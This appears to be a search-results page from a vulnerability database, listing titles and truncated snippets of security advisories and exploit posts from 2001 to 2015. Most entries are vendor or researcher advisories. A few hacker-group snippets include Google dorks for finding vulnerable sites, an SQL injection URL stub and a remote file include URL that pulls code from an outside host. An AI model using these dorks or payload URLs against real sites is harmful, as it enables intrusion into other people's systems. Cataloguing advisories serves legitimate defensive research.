47153 matches found
PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
PHP 5.3.5 graphemeextract NULL Pointer Dereference Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - Dis.: 09.12.2010 - Pub.: 17.02.2011 CVE: CVE-2011-0420 CERT: VU210829 Affected Software: - PHP 5.3.5 Fixed: SVN Original URL:...
ZDI-11-043: Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability
ZDI-11-043: Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-043 February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for...
[SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2011-0534 Apache Tomcat DoS vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.6 - - Tomcat 6.0.0 to 6.0.30 Description: Tomcat did not enforce the maxHttpHeaderSize limit while...
nSense-2010-003: Cisco Unified Communications Manager
nSense Vulnerability Research Security Advisory NSENSE-2010-003 --------------------------------------------------------------- Affected Vendor: Cisco Systems, Inc Affected Product: Cisco Unified Communications Manager Platform: All Impact: Privilege Escalation Vendor response: Patch. IntelliShie...
[SECURITY] [DSA 2121-1] New TYPO3 packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-2121-1 [email protected] http://www.debian.org/security/ Florian Weimer October 19, 2010 http://www.debian.org/security/faq -...
Mozilla Foundation Security Advisory 2010-33
Mozilla Foundation Security Advisory 2010-33 Title: User tracking across sites using Math.random Impact: Low Announced: June 22, 2010 Reporter: Amit Klein Products: Firefox, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 SeaMonkey 2.0.5 Description Security researcher Amit Klein reported that i...
Knowledgeroot (fckeditor) Remote Arbitrary File Upload Exploit
-= Description =- A security issue has been discovered in Knowledgeroot, which can be exploited by malicious people to bypass certain security restrictions. Access to the enabled FCKeditor component is not properly restricted, which can be exploited to e.g upload files of certain types. The...
Critical PowerDNS Recursor Security Vulnerabilities: please upgrade ASAP to 3.1.7.2
Dear PowerDNS Users, Two major vulnerabilities have recently been discovered in the PowerDNS Recursor all versions up to and including 3.1.7.1. Over the past two weeks, these vulnerabilities have been addressed, resulting in PowerDNS Recursor 3.1.7.2. Given the nature and magnitude of these...
[USN-824-1] PHP vulnerability
=========================================================== Ubuntu Security Notice USN-824-1 August 24, 2009 php5 vulnerability CVE-2009-2687 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu...
Mozilla Foundation Security Advisory 2008-52
Mozilla Foundation Security Advisory 2008-52 Title: Crashes with evidence of memory corruption rv:1.9.0.4/1.8.1.18 Impact: Critical Announced: November 12, 2008 Reporter: Mozilla developers and community Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.0.4 Firefox 2.0.0.18 Thunderbir...
PHP-Nuke Module Sectionsnew (printpage&artid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PHP-Nuke Module Sectionsnew printpage&artid AuTh0r : Ehsanhp200 H0ME : www.only-4dl.tk Email : [email protected] Persian Gulf 4 Ever! Dork : "inurl:modules.php?name=Sectionsnew" Exploite:...
[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated Severity: Important was moderate Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.37 Tomcat 5.5.0 to 5.5.26 Tomcat 6.0.0 to 6.0.16 The unsupported...
Blackboard (id) Remote SQL Injection
Bulan: Cr@zyKing Thanks : CrackersChild & Eno7 & Pablin77 & Sys7ech & Brond Crew & X-Tech .Inc & TheBekir AYYILDIZ SWAT TIM : Hoo0? Google Dork : "inurl:philboardforum.asp" ---------------------------------------------------- Exploit: philboardforum.asp?forumid=SQL...
DokuWiki suffers XSS
COMPASS SECURITY ADVISORY http://www.csnc.ch/ Product: DokuWiki Vendor: DokuWiki Project Subject: Cross-site scripting - XSS Risk: High Effect: Remotely exploitable Author: Cyrill Brunschwiler [email protected] Date: July 19th 2007 Introduction: ------------- Compass Security discovered...
sazcart v1.5 (cart.php) Remote File include
---Hitamputih crew--- Bug Found By : IbnuSina vendor : http://sazcart.com/site Risk : High Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fungmen,setiawan,irvian,meteoroid and all member hitamputih crew community bug found on admin/controls/cart.php include$saz'settings''shippingfolder'...
[Full-disclosure] Invision Power Board 2.1.7 debug mode vulnerability
Debug mode is a feature in IPB 2.0.0-2.1.7 that shows all database queries for each forum page requested. If Debug mode is turned on, it is possible for anyone to request a forgotten password for an account, and capture the validation key that is sent to the account's email address. This allows a...
Freenews v1.1 <= (chemin) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Freenews v1.1 = chemin Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by XORONturkish hacker...
Microsoft Security Bulletin MS05-017 Vulnerability in Message Queuing Could Allow Code Execution (892944)
Microsoft Security Bulletin MS05-017 Vulnerability in Message Queuing Could Allow Code Execution 892944 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Message Queuing MSMQ Impact of Vulnerability: Remote Code Execution Maximum Severity Ratin...
pWins Perl Web Server Directory Transversal Vulnerability
From www.sourceforge.net/projects/pwins: "pWins is a webserver-software based on perl and ruby not yet code. My aim is to make it fast, small and secure, supporting cgi perl, ruby and php scripts. It's easy to install and configurate!" versions: 0.2.5 and earlier, tested on Windows only...
ROTOS Remote SNMP Attack Tool
Internet Security Systems Security Alert February 12, 2002 PROTOS Remote SNMP Attack Tool Synopsis: ISS X-Force has learned of a powerful SNMP Simple Network Management Protocol attack tool that may be circulating in the computer underground. The PROTOS SNMP stress-testing tool sends thousands of...
Symantec LiveUpdate attacks
Phenoelit Advisory wir-haben-auch-mal-was-gefunden 0815 Authors FX [email protected] DasIch [email protected] kim0 [email protected] Phenoelit Group http://www.phenoelit.de Affected Products Symantec LiveUpdate 1.4 Symantec LiveUpdate 1.6 Vendor communication 09/22/2001 Symantec contacted via...
PDF Converter & Editor 2.1 iOS - File Include Vulnerability
Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID VL-ID: ===================================...
[ MDVSA-2015:027 ] kernel
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:027 http://www.mandriva.com/en/support/security/ Package : kernel Date : January 16, 2015 Affected: Business Server 1.0 Problem Description: Multiple vulnerabilities has been found and corrected in the Linux...
APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3 Safari 6.1.3 and Safari 7.0.3 are now available and address the following: WebKit Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2 Impact...
MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service
MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service http://cxsecurity.com/ YouTube Kaspersky PoC: https://www.youtube.com/watch?v=joa9IS7U90 ---- 0. Where is the problem? ---- Some time ago I have reported vulnerabilities in regcomp in BSD implementation CVE-2011-3336 and GNU li...
[ MDVSA-2014:010 ] memcached
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:010 http://www.mandriva.com/en/support/security/ Package : memcached Date : January 17, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 Problem Description: Multiple vulnerabilities has been...
[CVE-2013-0523] IBM WebSphere Commerce: Encrypted URL Parameter Vulnerable to Padding Oracle Attacks
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Encrypted URL Parameter Vulnerable to Padding Oracle Attacks Release Date: 2013-06-19 Application: IBM...
ESA-2013-018: EMC Smarts Product - Cross Site Scripting Vulnerability
ESA-2013-018.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-018: EMC Smarts Product - Cross Site Scripting Vulnerability EMC Identifier: ESA-2013-018 CVE Identifier: CVE-2013-0936 Severity Rating: CVSS v2 Base Score: 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P Affected products: EMC Smarts Product...
Cross-Site Scripting (XSS) Vulnerabilities in Flogr
Advisory ID: HTB23110 Product: Flogr Vendor: Flogr Vulnerable Versions: 2.5.6 and probably prior Tested Version: 2.5.6 Vendor Notification: August 15, 2012 Public Disclosure: September 5, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-4336 CVSSv2 Base Score: 4.3...
Guests can view names and emailadresses of all Liferay users in liferay 6.1
Guests can view names and emailadresses of all Liferay users in liferay 6.1 Description: Liferay Portal is an enterprise portal written in Java As an unauthenticated user it is possible to retrieve the names and email adresses of all Liferay users. To retrieve a list of all users simply issue the...
[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4
waraxe-2012-SA083 - Multiple Vulnerabilities in Uploadify 2.1.4 =============================================================================== Author: Janek Vind "waraxe" Date: 05. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-83.html Description of vulnerable software:...
Seotoaster SQL-Injection Admin Login Bypass
Advisory: Seotoaster SQL-Injection Admin Login Bypass Advisory ID: INFOSERVE-ADV2011-06 Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on Seotoaster v.1.9 Vendor URL: http://www.seotoaster.com/ Vendor Status: fixed ==========================...
Apple Safari / WebKit multiple security vulnerabilities
Crossite scripting, multiple memory corruption, code execution...
ZDI-11-183: Oracle Java ICC Profile MultiLanguage 'mluc' Tag Parsing Remote Code Execution Vulnerability
ZDI-11-183: Oracle Java ICC Profile MultiLanguage 'mluc' Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-183 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Jav...
AR Web Content Manager (AWCM) Cross-Site scripting Vulnerability
AR Web Content Manager AWCM v2.2 Cross-Site scripting Vulnerability SecPod Technologies www.secpod.com Author: Antu Sanadi SecPod ID: 1012 21/03/2011 Issue Discovered 24/03/2011 Vendor Notified 24/03/2011 Vendor Responded 25/03/2011 Vendor Solution Class: Cross-Site Scripting Severity: Medium...
Microsoft Security Bulletin MS10-090 - Critical Cumulative Security Update for Internet Explorer (2416400)
Microsoft Security Bulletin MS10-090 - Critical Cumulative Security Update for Internet Explorer 2416400 Published: December 14, 2010 Version: 1.0 General Information Executive Summary This security update resolves four privately reported vulnerabilities and three publicly disclosed vulnerabiliti...
Applicure dotDefender 4.0 administrative interface cross site scripting
Applicure dotDefender 4.0 administrative interface cross site scripting An advisory by EnableSecurity. ID: ES-20100601 Advisory URL: http://resources.enablesecurity.com/advisories/ES-20100601-dotdefender4.txt Affected Versions: version 4.0 Fixed versions: 4.01-3 and later Description: Applicure...
Interactivefx.ie CMS SQL Injection Vulnerability
================================================ Interactivefx.ie CMS SQL Injection Vulnerability ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / / / / 1 1 / ...
Adobe Acrobat and Reader multiple security vulnerabilities
Code executions, memory corruptions, buffer overflow, integer overflow, DoS on PDF parsing...
[security bulletin] HPSBMA02504 SSRT090220 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02000727 Version: 1 HPSBMA02504 SSRT090220 rev.1 - HP System Management Homepage SMH for Linux and Windows, Remote Cross Site Scripting XSS NOTICE: The information in this Security Bulletin shoul...
Oracle PL/SQL Injection Flaw in REPCAT_RPC.VALIDATE_REMOTE_RC
Hey all, The Oracle REPCATRPC.VALIDATEREMOTERC function executes blocks of anonymous PL/SQL that can be influenced by an attacker to execute arbitrary PL/SQL. As this package is only accessible directly by SYS this flaw would not normally present a risk. However, the REPCATRPC.VALIDATEREMOTERC...
ZDI-09-058: Oracle Secure Backup Administration Server Authentication Bypass Vulnerability
ZDI-09-058: Oracle Secure Backup Administration Server Authentication Bypass Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-058 -- CVE ID: CVE-2009-1977 -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows...
Mozilla Foundation Security Advisory 2007-19
Mozilla Foundation Security Advisory 2007-19 Title: XSS using addEventListener and setTimeout Impact: High Announced: July 17, 2007 Reporter: Products: Firefox Fixed in: Firefox 2.0.0.5 Description Mozilla contributor mozbugra4 demonstrated that the methods addEventListener and setTimeout could b...
american cart 3.* (abs_path) remote file include
american cart 3.5 abspath remote file include script Vendor: http://americancart.us Discovered by: IbnuSina Dork : "powered by american cart" ================= exploitz : http://target.lu/americanpath/index.php?abspath=injekan.lu? http://target.lu/americanpath/checkout.php?abspath=injekan.lu?...
CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites
-------------------------------------------------------------------------------- Title : BT-Sondage-v112 Remote File Include Vulnerability -------------------------------------------------------------------------------- Author: CrackersChild cont@ct: [email protected]...
[USN-2391-1] php5 vulnerabilities
========================================================================== Ubuntu Security Notice USN-2391-1 October 30, 2014 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
APPLE-SA-2014-10-16-1 OS X Yosemite v10.10
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-10-16-1 OS X Yosemite v10.10 OS X Yosemite v10.10 is now available and addresses the following: 802.1X Impact: An attacker can obtain WiFi credentials Description: An attacker could have impersonated a WiFi access point, offered to...
[security bulletin] HPSBMU03110 rev.1 - HP Sprinter, Remote Execution of Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04454636 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04454636 Version: 1 HPSBMU03110 rev....
[SECURITY] [DSA 2970-1] cacti security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2970-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff June 29, 2014 http://www.debian.org/security/faq -...
[ISecAuditors Security Advisories] - Reflected XSS vulnerability in Boxcryptor (www.boxcryptor.com)
============================================= INTERNET SECURITY AUDITORS ALERT 2014-001 - Original release date: February 4, 2014 - Last revised: February 4, 2014 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 CVSSv2 Base Scored - CVE-ID: - =============================================...